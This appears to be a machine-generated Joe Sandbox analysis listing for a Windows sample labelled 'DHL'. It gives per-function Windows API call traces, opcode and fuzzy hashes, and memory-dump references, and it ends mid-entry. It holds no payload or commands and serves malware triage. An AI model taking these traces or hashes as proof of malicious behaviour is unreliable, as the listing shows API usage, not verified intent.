                                                        • Opcode ID: 4b3fe3950935b4f943d2fbbf88ee4bfb5004be91cbff7a387bbbd0af6912367f
                                                        • Instruction ID: 098b099d0e20c6997c7b82cbd982239900db5f44a3bd5c2742a1ef3ccab8e017
                                                        • Opcode Fuzzy Hash: 4b3fe3950935b4f943d2fbbf88ee4bfb5004be91cbff7a387bbbd0af6912367f
                                                        • Instruction Fuzzy Hash: E881AE30218241EFC714DF28D891E6ABBE5FF85318F14896CF4594B2A2DB31ED45CBA2
                                                        APIs
                                                        • VariantInit.OLEAUT32(00000035), ref: 009FF7B9
                                                        • SysAllocString.OLEAUT32(00000001), ref: 009FF860
                                                        • VariantCopy.OLEAUT32(009FFA64,00000000), ref: 009FF889
                                                        • VariantClear.OLEAUT32(009FFA64), ref: 009FF8AD
                                                        • VariantCopy.OLEAUT32(009FFA64,00000000), ref: 009FF8B1
                                                        • VariantClear.OLEAUT32(?), ref: 009FF8BB
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: Variant$ClearCopy$AllocInitString
                                                        • String ID:
                                                        • API String ID: 3859894641-0
                                                        • Opcode ID: 28d605b5318bb179a92b30a12f2edfab2a848b273ee135a1cf7f5245a62e3207
                                                        • Instruction ID: b13cb309d463835c6020c61b0fb144a42664f2e9219a8b696e5cd963000b4041
                                                        • Opcode Fuzzy Hash: 28d605b5318bb179a92b30a12f2edfab2a848b273ee135a1cf7f5245a62e3207
                                                        • Instruction Fuzzy Hash: 2F51EC35500318BACF14AF65D8B5739B3A8EF85720F249467FA06DF292DBB48C80D796
                                                        APIs
                                                          • Part of subcall function 009A7620: _wcslen.LIBCMT ref: 009A7625
                                                          • Part of subcall function 009A6B57: _wcslen.LIBCMT ref: 009A6B6A
                                                        • GetOpenFileNameW.COMDLG32(00000058), ref: 00A194E5
                                                        • _wcslen.LIBCMT ref: 00A19506
                                                        • _wcslen.LIBCMT ref: 00A1952D
                                                        • GetSaveFileNameW.COMDLG32(00000058), ref: 00A19585
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: _wcslen$FileName$OpenSave
                                                        • String ID: X
                                                        • API String ID: 83654149-3081909835
                                                        • Opcode ID: 9e41704695d7017b8ea12808525f2c95823e69d5a48534bf0795cfdbbf61e5c7
                                                        • Instruction ID: dac96522961097546b714197db3410f3dec61909d5a7d4b7d36fbe0128694ba3
                                                        • Opcode Fuzzy Hash: 9e41704695d7017b8ea12808525f2c95823e69d5a48534bf0795cfdbbf61e5c7
                                                        • Instruction Fuzzy Hash: 73E18E31A083109FD724DF24C891BAAB7E5BFC5314F04896DF8999B2A2DB31DD45CB92
                                                        APIs
                                                          • Part of subcall function 009B9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 009B9BB2
                                                        • BeginPaint.USER32(?,?,?), ref: 009B9241
                                                        • GetWindowRect.USER32(?,?), ref: 009B92A5
                                                        • ScreenToClient.USER32(?,?), ref: 009B92C2
                                                        • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 009B92D3
                                                        • EndPaint.USER32(?,?,?,?,?), ref: 009B9321
                                                        • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 009F71EA
                                                          • Part of subcall function 009B9339: BeginPath.GDI32(00000000), ref: 009B9357
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: BeginPaintWindow$ClientLongPathRectRectangleScreenViewport
                                                        • String ID:
                                                        • API String ID: 3050599898-0
                                                        • Opcode ID: 336638d275780c1e8edff17b0df2d31863558d254c299fcc3c04898f12f277d8
                                                        • Instruction ID: c5490f4d58a8b4982857200cbd2971007a27b60dddfb781a6c87e36890abc5c0
                                                        • Opcode Fuzzy Hash: 336638d275780c1e8edff17b0df2d31863558d254c299fcc3c04898f12f277d8
                                                        • Instruction Fuzzy Hash: 5141AF31108204AFD711DFA8CC85FBA7BE8EB45730F144629FA64972A1C7319846DB61
                                                        APIs
                                                        • InterlockedExchange.KERNEL32(?,000001F5), ref: 00A1080C
                                                        • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 00A10847
                                                        • EnterCriticalSection.KERNEL32(?), ref: 00A10863
                                                        • LeaveCriticalSection.KERNEL32(?), ref: 00A108DC
                                                        • ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 00A108F3
                                                        • InterlockedExchange.KERNEL32(?,000001F6), ref: 00A10921
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
                                                        • String ID:
                                                        • API String ID: 3368777196-0
                                                        • Opcode ID: 15eb81045d24bbca7caf1a84f056ce7bdd1f2c3291330182380fbd238551182d
                                                        • Instruction ID: 97b75eb65a937778d3ee029daa0046397e7f0aa04c48c8d4aca04e22364d902a
                                                        • Opcode Fuzzy Hash: 15eb81045d24bbca7caf1a84f056ce7bdd1f2c3291330182380fbd238551182d
                                                        • Instruction Fuzzy Hash: 7E416971900205EBDF14EFA4DC85AAA77B9FF44710F1440A9ED04AA297DB70DEA1DBA0
                                                        APIs
                                                        • ShowWindow.USER32(FFFFFFFF,00000000,?,00000000,00000000,?,009FF3AB,00000000,?,?,00000000,?,009F682C,00000004,00000000,00000000), ref: 00A3824C
                                                        • EnableWindow.USER32(00000000,00000000), ref: 00A38272
                                                        • ShowWindow.USER32(FFFFFFFF,00000000), ref: 00A382D1
                                                        • ShowWindow.USER32(00000000,00000004), ref: 00A382E5
                                                        • EnableWindow.USER32(00000000,00000001), ref: 00A3830B
                                                        • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 00A3832F
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: Window$Show$Enable$MessageSend
                                                        • String ID:
                                                        • API String ID: 642888154-0
                                                        • Opcode ID: 6e35fbfe77a5d109b0795c9abc506be31532efcf7955d39b625aade9d69f63b8
                                                        • Instruction ID: eff9dfc882b9f960d2d768388b9ab032cafa52bace893c26e2fa624032aafca7
                                                        • Opcode Fuzzy Hash: 6e35fbfe77a5d109b0795c9abc506be31532efcf7955d39b625aade9d69f63b8
                                                        • Instruction Fuzzy Hash: 1641A574601744AFDB11CF95DC99BE57BE0FB0A714F184169FA185F262CB35A842CB50
                                                        APIs
                                                        • IsWindowVisible.USER32(?), ref: 00A04C95
                                                        • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00A04CB2
                                                        • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00A04CEA
                                                        • _wcslen.LIBCMT ref: 00A04D08
                                                        • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00A04D10
                                                        • _wcsstr.LIBVCRUNTIME ref: 00A04D1A
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen_wcsstr
                                                        • String ID:
                                                        • API String ID: 72514467-0
                                                        • Opcode ID: 488c78dd01fc4d2b71d2337118983193eed039bf4641cd6de6981a484b2c0a12
                                                        • Instruction ID: c79046b17512f1431d65d99ea5054a942f9007e7aece1b2fd2c5baa21bf59aa9
                                                        • Opcode Fuzzy Hash: 488c78dd01fc4d2b71d2337118983193eed039bf4641cd6de6981a484b2c0a12
                                                        • Instruction Fuzzy Hash: F62129B26042047BEB159B75AC0AF7B7BACEF89760F10402DF905DA1D1DB75CD0187A0
                                                        APIs
                                                          • Part of subcall function 009A3AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,009A3A97,?,?,009A2E7F,?,?,?,00000000), ref: 009A3AC2
                                                        • _wcslen.LIBCMT ref: 00A1587B
                                                        • CoInitialize.OLE32(00000000), ref: 00A15995
                                                        • CoCreateInstance.OLE32(00A3FCF8,00000000,00000001,00A3FB68,?), ref: 00A159AE
                                                        • CoUninitialize.OLE32 ref: 00A159CC
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: CreateFullInitializeInstanceNamePathUninitialize_wcslen
                                                        • String ID: .lnk
                                                        • API String ID: 3172280962-24824748
                                                        • Opcode ID: 260d5f252a28f8274afa0dcc474ad75d0ef0e5a15157c7a421e4e0d318dab6eb
                                                        • Instruction ID: 3fe952a7308d53f20840f826b59d49a4bad16447e79889fd64e69045539d4f22
                                                        • Opcode Fuzzy Hash: 260d5f252a28f8274afa0dcc474ad75d0ef0e5a15157c7a421e4e0d318dab6eb
                                                        • Instruction Fuzzy Hash: 64D14271A08601DFC714DF24C884A6ABBE5FFC9710F148859F88A9B261DB31ED85CB92
                                                        APIs
                                                          • Part of subcall function 00A00FB4: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00A00FCA
                                                          • Part of subcall function 00A00FB4: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00A00FD6
                                                          • Part of subcall function 00A00FB4: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00A00FE5
                                                          • Part of subcall function 00A00FB4: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00A00FEC
                                                          • Part of subcall function 00A00FB4: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00A01002
                                                        • GetLengthSid.ADVAPI32(?,00000000,00A01335), ref: 00A017AE
                                                        • GetProcessHeap.KERNEL32(00000008,00000000), ref: 00A017BA
                                                        • HeapAlloc.KERNEL32(00000000), ref: 00A017C1
                                                        • CopySid.ADVAPI32(00000000,00000000,?), ref: 00A017DA
                                                        • GetProcessHeap.KERNEL32(00000000,00000000,00A01335), ref: 00A017EE
                                                        • HeapFree.KERNEL32(00000000), ref: 00A017F5
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                        • String ID:
                                                        • API String ID: 3008561057-0
                                                        • Opcode ID: 9209ed13d3356624cf392c347d2635d54a1af2b905727d614a6cc52a7c7f2842
                                                        • Instruction ID: a3d72c62c8104051d4f5005936aa2ca7b3f1380627554766eda5db66aae320be
                                                        • Opcode Fuzzy Hash: 9209ed13d3356624cf392c347d2635d54a1af2b905727d614a6cc52a7c7f2842
                                                        • Instruction Fuzzy Hash: 00117932600209EFDB14DFA4EC59FEE7BB9EB46365F104118F481A7290D736A945DF60
                                                        APIs
                                                        • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00A014FF
                                                        • OpenProcessToken.ADVAPI32(00000000), ref: 00A01506
                                                        • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00A01515
                                                        • CloseHandle.KERNEL32(00000004), ref: 00A01520
                                                        • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00A0154F
                                                        • DestroyEnvironmentBlock.USERENV(00000000), ref: 00A01563
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                        • String ID:
                                                        • API String ID: 1413079979-0
                                                        • Opcode ID: 52a78c0cb7b128d395c3669605d7ee1cd0ee6e803fab26f8ab75f0ce2d6d5433
                                                        • Instruction ID: c41f492ec5823d33b666d015798fbaf4c8829f3ce0569b3b44149f80e4284793
                                                        • Opcode Fuzzy Hash: 52a78c0cb7b128d395c3669605d7ee1cd0ee6e803fab26f8ab75f0ce2d6d5433
                                                        • Instruction Fuzzy Hash: FE1156B250020DABDF11CFE8ED49FDE7BA9EF48718F044024FA05A60A0C3769E65DB60
                                                        APIs
                                                        • GetLastError.KERNEL32(?,?,009C3379,009C2FE5), ref: 009C3390
                                                        • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 009C339E
                                                        • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 009C33B7
                                                        • SetLastError.KERNEL32(00000000,?,009C3379,009C2FE5), ref: 009C3409
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: ErrorLastValue___vcrt_
                                                        • String ID:
                                                        • API String ID: 3852720340-0
                                                        • Opcode ID: d2042e39ec4d64987e52928261f91e0c87c8f9fe6da66da4cfd93c1445d4855c
                                                        • Instruction ID: 312eea314c76fb29886d59c6c082e1e7a0b41e80c74b4b5bc44a4927a1f7b5fc
                                                        • Opcode Fuzzy Hash: d2042e39ec4d64987e52928261f91e0c87c8f9fe6da66da4cfd93c1445d4855c
                                                        • Instruction Fuzzy Hash: 53012432E0C711BEE62427B47C96F762AA8EB45379360C32EF410852F0FF514D025286
                                                        APIs
                                                        • GetLastError.KERNEL32(?,?,009D5686,009E3CD6,?,00000000,?,009D5B6A,?,?,?,?,?,009CE6D1,?,00A68A48), ref: 009D2D78
                                                        • _free.LIBCMT ref: 009D2DAB
                                                        • _free.LIBCMT ref: 009D2DD3
                                                        • SetLastError.KERNEL32(00000000,?,?,?,?,009CE6D1,?,00A68A48,00000010,009A4F4A,?,?,00000000,009E3CD6), ref: 009D2DE0
                                                        • SetLastError.KERNEL32(00000000,?,?,?,?,009CE6D1,?,00A68A48,00000010,009A4F4A,?,?,00000000,009E3CD6), ref: 009D2DEC
                                                        • _abort.LIBCMT ref: 009D2DF2
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: ErrorLast$_free$_abort
                                                        • String ID:
                                                        • API String ID: 3160817290-0
                                                        • Opcode ID: 3fc6ef54117cc636e30bf7abcd047474e347de6eb9013d3c77273cc685083414
                                                        • Instruction ID: 68f7a7c35b3c0145952efe3c5a467968eb23e294a49c0d7365d6b1746abab0a5
                                                        • Opcode Fuzzy Hash: 3fc6ef54117cc636e30bf7abcd047474e347de6eb9013d3c77273cc685083414
                                                        • Instruction Fuzzy Hash: 24F0CD355C460067C21267747C06F5B266F6FE27B1F25C517F464A73D2EE6488025271
                                                        APIs
                                                          • Part of subcall function 009B9639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 009B9693
                                                          • Part of subcall function 009B9639: SelectObject.GDI32(?,00000000), ref: 009B96A2
                                                          • Part of subcall function 009B9639: BeginPath.GDI32(?), ref: 009B96B9
                                                          • Part of subcall function 009B9639: SelectObject.GDI32(?,00000000), ref: 009B96E2
                                                        • MoveToEx.GDI32(?,-00000002,00000000,00000000), ref: 00A38A4E
                                                        • LineTo.GDI32(?,00000003,00000000), ref: 00A38A62
                                                        • MoveToEx.GDI32(?,00000000,-00000002,00000000), ref: 00A38A70
                                                        • LineTo.GDI32(?,00000000,00000003), ref: 00A38A80
                                                        • EndPath.GDI32(?), ref: 00A38A90
                                                        • StrokePath.GDI32(?), ref: 00A38AA0
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                        • String ID:
                                                        • API String ID: 43455801-0
                                                        • Opcode ID: 1207b901bb2bcd7d18154d2eb1cbd92219df59249dc2a415d8749698c3624b71
                                                        • Instruction ID: cdda1c94659081a9561c33c747ce215edd105305a23d8cb21176f63c2195c10b
                                                        • Opcode Fuzzy Hash: 1207b901bb2bcd7d18154d2eb1cbd92219df59249dc2a415d8749698c3624b71
                                                        • Instruction Fuzzy Hash: 2911CC7640014DFFDB11DFD4DC48E9A7F6DEB05364F048011FA1999161C7719D56DB60
                                                        APIs
                                                        • GetDC.USER32(00000000), ref: 00A05218
                                                        • GetDeviceCaps.GDI32(00000000,00000058), ref: 00A05229
                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00A05230
                                                        • ReleaseDC.USER32(00000000,00000000), ref: 00A05238
                                                        • MulDiv.KERNEL32(000009EC,?,00000000), ref: 00A0524F
                                                        • MulDiv.KERNEL32(000009EC,00000001,?), ref: 00A05261
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: CapsDevice$Release
                                                        • String ID:
                                                        • API String ID: 1035833867-0
                                                        • Opcode ID: 60169d6a776f325ad0a7324bf8806c25220a5035b0591f8aa5edf8afdc2929ed
                                                        • Instruction ID: 585e420d12057e27e71d22271f73f550da0c936f1e12e031982d861064148eb4
                                                        • Opcode Fuzzy Hash: 60169d6a776f325ad0a7324bf8806c25220a5035b0591f8aa5edf8afdc2929ed
                                                        • Instruction Fuzzy Hash: 91014F75E00718BBEB109BF59C49B5EBFB8EF48761F044065FA04E7291D6709901CFA0
                                                        APIs
                                                        • MapVirtualKeyW.USER32(0000005B,00000000), ref: 009A1BF4
                                                        • MapVirtualKeyW.USER32(00000010,00000000), ref: 009A1BFC
                                                        • MapVirtualKeyW.USER32(000000A0,00000000), ref: 009A1C07
                                                        • MapVirtualKeyW.USER32(000000A1,00000000), ref: 009A1C12
                                                        • MapVirtualKeyW.USER32(00000011,00000000), ref: 009A1C1A
                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 009A1C22
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: Virtual
                                                        • String ID:
                                                        • API String ID: 4278518827-0
                                                        • Opcode ID: 49e819b7814d94e68da622e601b9ac326db4ef3ce621dc8f2568275bb6a970dd
                                                        • Instruction ID: 74b703975d66cc58a9cc6e4452c1a5f2f5891e44dc75f26e2634c1a1742ffddf
                                                        • Opcode Fuzzy Hash: 49e819b7814d94e68da622e601b9ac326db4ef3ce621dc8f2568275bb6a970dd
                                                        • Instruction Fuzzy Hash: 820167B0902B5ABDE3008F6A8C85B52FFA8FF19354F00411BA15C4BA42C7F5A864CBE5
                                                        APIs
                                                        • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00A0EB30
                                                        • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00A0EB46
                                                        • GetWindowThreadProcessId.USER32(?,?), ref: 00A0EB55
                                                        • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00A0EB64
                                                        • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00A0EB6E
                                                        • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00A0EB75
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
